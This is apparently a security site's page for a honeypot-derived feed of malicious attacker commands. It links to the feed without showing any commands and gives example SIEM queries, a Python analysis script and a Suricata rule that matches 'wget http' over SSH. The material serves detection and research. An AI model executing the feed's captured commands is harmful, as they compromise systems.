← Back to all feeds

⚡ Malicious Commands Feed

Real commands and payloads executed by attackers on our honeypots. Valuable for understanding attack patterns, building detection rules, and security research.

⚠️ Warning: These commands are malicious. Do not execute them on production systems. Use only for research and detection rule development.

Command Feed

All captured malicious commands

⭐

commands.txt

Complete command feed

View Download

How to Use Command Feeds

Create SIEM Detection Rules:

# Splunk Detection
index=linux sourcetype=bash_history
[| inputlookup checkthesum_commands.csv | fields command]

# Elastic SIEM
GET /logs/_search
{
  "query": {
    "terms": {
      "process.command_line": {
        "index": "checkthesum-commands"
      }
    }
  }
}

Analyze Attack Patterns:

#!/usr/bin/env python3
import requests
from collections import Counter

# Download commands
response = requests.get('https://www.check-the-sum.fr/feeds/commands/commands.txt')
commands = response.text.strip().split('\n')

# Analyze patterns
first_words = [cmd.split()[0] if cmd.split() else '' for cmd in commands]
common_commands = Counter(first_words).most_common(10)

print("Top 10 most common attack commands:")
for cmd, count in common_commands:
    print(f"{cmd}: {count} times")

Generate Suricata Rules:

# Example Suricata rule for malicious commands
alert tcp any any -> any 22 (
  msg:"Malicious SSH command detected";
  content:"wget http"; nocase;
  flow:to_server,established;
  classtype:trojan-activity;
  sid:1000001;
  rev:1;
)